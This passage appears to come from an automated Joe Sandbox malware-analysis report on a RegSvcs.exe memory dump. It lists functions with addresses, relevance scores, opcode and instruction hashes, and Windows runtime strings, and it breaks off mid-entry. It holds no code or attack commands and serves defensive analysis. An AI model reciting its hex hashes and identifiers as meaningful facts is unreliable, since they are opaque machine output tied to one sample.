                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        • API String ID: 0-4066393604
                                                        • Opcode ID: a3943bcffb2763472ffdccaefb8994743d7ed69e66bfcf80730d863d3db85c00
                                                        • Instruction ID: 618d22072f1609f62344f4e33529d8eaaef1ecb43697eaf763fdd38b98e43a31
                                                        • Opcode Fuzzy Hash: a3943bcffb2763472ffdccaefb8994743d7ed69e66bfcf80730d863d3db85c00
                                                        • Instruction Fuzzy Hash: 3FE15D71A006299FEB229EDDCE90BAEBBBABF04710F10452AE901E7751D7B4D941CF50
                                                        Function 016EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction ID: 2d38147ae5ac134512bf80f73553ac4cc97d7a245de551955f9b82f04b1beb3f
                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction Fuzzy Hash: 90C1BE312053429BEB24CF68CC49B6BBBE6AFD4318F084B2CF6968B290D774D509CB55
                                                        Function 0169E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: d2be99efa34965375b01c85f5bb29c2e7bfb98473f7daaa22db35b5cc745ffee
                                                        • Instruction ID: 2a9aedf3313bd3bfa16efd70506c8299a1cc45fb1fe74f4338e5e59dab337b4c
                                                        • Opcode Fuzzy Hash: d2be99efa34965375b01c85f5bb29c2e7bfb98473f7daaa22db35b5cc745ffee
                                                        • Instruction Fuzzy Hash: 3D615871E006199FDB24DFA88D40BAEBBB9FB48700F15406EE649EB291D732A941CB54
                                                        Function 016C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        • API String ID: 0-17815947
                                                        • Opcode ID: 1d8c1e4de66991b4f2b2b8729933d11e1396d357136e86ebb52e702b0400e63a
                                                        • Instruction ID: c056c5a3f4c81e7dea5d1b4b5e34e84551fd0a940ec688050a5ce2a93b0c88c3
                                                        • Opcode Fuzzy Hash: 1d8c1e4de66991b4f2b2b8729933d11e1396d357136e86ebb52e702b0400e63a
                                                        • Instruction Fuzzy Hash: 285118B1D0021DAEDB11DFA9CC90AEEBBBDEB54B54F10452DE611B7290DB309D05CB64
                                                        Function 016204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0162063D
                                                        • kLsE, xrefs: 01620540
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        • Opcode ID: ee716b6577eccfa8e74e3ebc6240e9cd353c07bb921e6cee2022ca05c2594448
                                                        • Instruction ID: 048b9725adb6f53532aae7a806799023e76b46b75d431b980a183391b670d33a
                                                        • Opcode Fuzzy Hash: ee716b6577eccfa8e74e3ebc6240e9cd353c07bb921e6cee2022ca05c2594448
                                                        • Instruction Fuzzy Hash: 3F51AC71504B628BD734DF68C9446A7BBE8AF85304F10883EFA9A87341E7709545CF96
                                                        Function 0162A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0162A2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0162A309
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        • Opcode ID: a7099aa55a6fd6d8960ce774b2e137d6154d2767a83d556649c36d50a6fb3faa
                                                        • Instruction ID: 0465d27b226ef08ee8e6f4db28c421a58d2d8a44baff0c57a6a9083ef9fb3821
                                                        • Opcode Fuzzy Hash: a7099aa55a6fd6d8960ce774b2e137d6154d2767a83d556649c36d50a6fb3faa
                                                        • Instruction Fuzzy Hash: 4541DC31A01A66CBDB21DF99CC40B6A7BB5FF84704F1441A9E900DB792E3B5C901CF85
                                                        Function 0165A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        • Opcode ID: 24cfea90321e27f502e415369654c1f6bd452f97bb88c057d68ce39639de9310
                                                        • Instruction ID: aa13a0b5d36c44140aa569262b041b7c253c19f38813ba0917e0036e4f024631
                                                        • Opcode Fuzzy Hash: 24cfea90321e27f502e415369654c1f6bd452f97bb88c057d68ce39639de9310
                                                        • Instruction Fuzzy Hash: FE01D1B2250700AFD351DF64CE45B1677E8E794725F018A3DBA48CB190E374D804CB5A
                                                        Function 0162C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        • Opcode ID: ba854c559cb887386123aead9ca30514fc79a3177196740be1df1691bddf76a9
                                                        • Instruction ID: 049c84c69768d95e4aabb2cd8336e66534352bd6ed695f179f54de676eaad0ce
                                                        • Opcode Fuzzy Hash: ba854c559cb887386123aead9ca30514fc79a3177196740be1df1691bddf76a9
                                                        • Instruction Fuzzy Hash: 7D825B75E00A298FEB25CFA9CC80BEDBBB1BF49310F148169E959AB391D7349941CF50
                                                        Function 016A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                        • Instruction ID: ba69b71503f592f0185f437dbabc6a211e8203dffeb8b064576029a7b5222dfe
                                                        • Opcode Fuzzy Hash: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                        • Instruction Fuzzy Hash: D2918571900229AFEB21DF95CD85FAEBBB9EF54750F544059F600AB290D774AD00CFA4
                                                        Function 016CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                        • Instruction ID: 312457e019b8ea4c13b605ed6c50d1b9caf2222f3cf833f2d1a35cc4a53a8f50
                                                        • Opcode Fuzzy Hash: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                        • Instruction Fuzzy Hash: 71918032900649AFDB22ABA5DC44FBFBF7AEF95B50F10001DF505A7250DB79A901CB94
                                                        Function 0165A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        • Opcode ID: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                        • Instruction ID: 02266399b0c34ac0088afa6a14134d920c727ef52aab92bb37663ed34b9f140c
                                                        • Opcode Fuzzy Hash: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                        • Instruction Fuzzy Hash: 34716175E0031A9FDF28CF9CD990AADBBB6BF48710F14812EE505AB341E7709941CB64
                                                        Function 016C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .mui
                                                        • API String ID: 0-1199573805
                                                        • Opcode ID: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                        • Instruction ID: 6224b71b2a821c7e6d393af06109bbf9cece318540708d2ea8c32db5675947f0
                                                        • Opcode Fuzzy Hash: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                        • Instruction Fuzzy Hash: 66515B72D0062ADBDB10DF9DDC50ABEBBB5EF14A50F05416EEA12BB344DB349901CBA4
                                                        Function 0163E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        • Opcode ID: 82d290e4e5baf4264e01423f72c5cb5923b58928d6eb03538e28fb4721c62186
                                                        • Instruction ID: 2e7ae32af848a9b62020256354ac432c82c6660e512af330b5a8d728bb057231
                                                        • Opcode Fuzzy Hash: 82d290e4e5baf4264e01423f72c5cb5923b58928d6eb03538e28fb4721c62186
                                                        • Instruction Fuzzy Hash: BE4190725083169BD721DA79CC40BABB7E9AFC8714F04092DFA84D7280E775D904C7A6
                                                        Function 0169C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        • Opcode ID: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                        • Instruction ID: 07d74ccdc928cb216182d93a4fa40bb62033c7e22d1abca4410d4d496d7c992c
                                                        • Opcode Fuzzy Hash: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                        • Instruction Fuzzy Hash: DB4152B1D0012DABDF21DA50CD84FDEBB7DAB45714F0145E9EA08AB140DB709E89CFA8
                                                        Function 016B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                        • Instruction ID: eca21c49a26bf361552eb2617068c7da79c96cac7ef37292f768cae4735a0d20
                                                        • Opcode Fuzzy Hash: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                        • Instruction Fuzzy Hash: 4A311431A007199BEB22DB69CC90BEEBBB9DF55704F144068EA41AB382CB75DC85CB54
                                                        Function 0169CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        • Opcode ID: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                        • Instruction ID: efe0c25bb890e6875b593147629f5c08cd16bf63db4b7acbb6d717aba6bd40a9
                                                        • Opcode Fuzzy Hash: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                        • Instruction Fuzzy Hash: F931E13690051AAFEF16DA59CC55E7FBB78EB80760F014169E905A7290D7309E05DBE0
                                                        Function 016A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016A895E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
                                                        • Opcode ID: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                        • Instruction ID: bf0888b5b4b0d8bb59fdbba4ac12d86207a0d109242233a501fc3cb8ceca0e98
                                                        • Opcode Fuzzy Hash: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                        • Instruction Fuzzy Hash: 900176B22042019FE7396B1DCC84A9ABF6AEFC6665B84002CF24103655CB20AC82CF96
                                                        Function 016C2000 Relevance: .8, Instructions: 757COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                        • Instruction ID: edbe0fbeb6a1504840189c320f0cc8658dddd1217e21783138a9ea6b273326da
                                                        • Opcode Fuzzy Hash: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                        • Instruction Fuzzy Hash: 2E42AE756093418BD725CF68CCA0A7BBBE6EB88B00F49492EFE8697350D770D845CB52
                                                        Function 016B8158 Relevance: .6, Instructions: 617COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
                                                        • Instruction ID: 0fae13eb55e86683a6904f4e923e307642cd5b97e913fecd4e2ae17f97343bce
                                                        • Opcode Fuzzy Hash: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
                                                        • Instruction Fuzzy Hash: 79423D75A002198FEB25CF69CC81BEDBBFABF48300F158199E949AB342D7349985CF50
                                                        Function 01632840 Relevance: .6, Instructions: 605COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
                                                        • Instruction ID: 51bed3936a298fddcbc158c6a1d9f0b3a81aa481e0065a2b30b09eacdec2d699
                                                        • Opcode Fuzzy Hash: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
                                                        • Instruction Fuzzy Hash: 7E32CDB0A007558BEB25EF69CC547BEBBF2BF84704F24821DD54A9B385D735A842CB60
                                                        Function 016CA118 Relevance: .6, Instructions: 591COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
                                                        • Instruction ID: 4cdaece25a467ce2d5fbb26de3531066580164eb8b3005942edfc139a0aadc8a
                                                        • Opcode Fuzzy Hash: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
                                                        • Instruction Fuzzy Hash: BF22BD746046698BEB25CFA9C894372BBF1EF44B00F08C55EE9868B386F335D452DB60
                                                        Function 01626A50 Relevance: .5, Instructions: 548COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
                                                        • Instruction ID: 6602ce2abc5f35f0198ec553c997d315504bc7d816c6c46a7eb3863ae9317387
                                                        • Opcode Fuzzy Hash: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
                                                        • Instruction Fuzzy Hash: 1032BE71A05615CFDB25DF68C880BAABBF2FF48310F148669E956AB391D730E842CF50
                                                        Function 01644A35 Relevance: .4, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                        • Instruction ID: 7a2bd0764b520999af89febe64797489f0b22b2ab2f5cdb25086f6f1cdd2ad5e
                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                        • Instruction Fuzzy Hash: 43F17171E0021A9BDF15DF99CD81BAEBBF6BF48710F098169E945AB340EB34D841CB64
                                                        Function 016B892B Relevance: .4, Instructions: 386COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
                                                        • Instruction ID: 41de8e92c7b53b76a13f5e726961d27be0ab9567a3bb5787352c5a38e970e319
                                                        • Opcode Fuzzy Hash: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
                                                        • Instruction Fuzzy Hash: 23D1E271E0060A8BDF15CF69CC81AFEB7FEAF88304F18816AD955A7241D735E946CB60
                                                        Function 016265D0 Relevance: .4, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
                                                        • Instruction ID: 949a4827902bf7243a089df4156e1d9eeb80f49ff3974d5fb502476401ef8365
                                                        • Opcode Fuzzy Hash: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
                                                        • Instruction Fuzzy Hash: 64E1AE71608752CFC715CF28C890A6ABBE1FF89314F058A6DE99987351DB31E906CF92
                                                        Function 01618397 Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
                                                        • Instruction ID: 8ac2d6902ab0e4b99afc7170718bdb887c37aeba6715dc57a3dc96e4ac37ff33
                                                        • Opcode Fuzzy Hash: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
                                                        • Instruction Fuzzy Hash: 87D10371A006169BDB14CF68CC90EBEB7BAFF54314F09462DEA16DB284EB34E951CB50
                                                        Function 016A8243 Relevance: .3, Instructions: 322COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                        • Instruction ID: 74e5f5b10202c01bb28de6f3902da432b14ceeea6990281fd027e2219fe190e2
                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                        • Instruction Fuzzy Hash: B8B17174A006059FEB24DB99CD40AABBBBEFF84305F90846DAA4297790DB34ED45CF50
                                                        Function 01630535 Relevance: .3, Instructions: 300COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction ID: 79cc52e7418bca73922415beb8a20d5cbe626597a79e8778d76640210282b82c
                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction Fuzzy Hash: 7BB10671604646AFDB26DB68CD50BBEBBF6AFC8310F140299E552D7381DB30E946CB90
                                                        Function 016283C0 Relevance: .3, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
                                                        • Instruction ID: 2c9d0751dcbebfbdf1698a6989ed02ec414120ad954f99adf177eb0ed5bb706b
                                                        • Opcode Fuzzy Hash: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
                                                        • Instruction Fuzzy Hash: C6C156702083418FE764DF18C894BAAB7E9BF88304F44496DE98997391D7B4E909CF92
                                                        Function 0161C427 Relevance: .3, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
                                                        • Instruction ID: 41041f693ada8f7b7c3220abe833344283f7ac8e5340a23f08dcae7b972448bc
                                                        • Opcode Fuzzy Hash: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
                                                        • Instruction Fuzzy Hash: 67B18270A402668BDB64DF58CC90BADB7B6EF44700F0885E9D50AE7385EB30DD86CB24
                                                        Function 0164E5E7 Relevance: .3, Instructions: 278COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 128e1839285258c419fd9f30d6340c63aba8479057773991335c85770b300eae
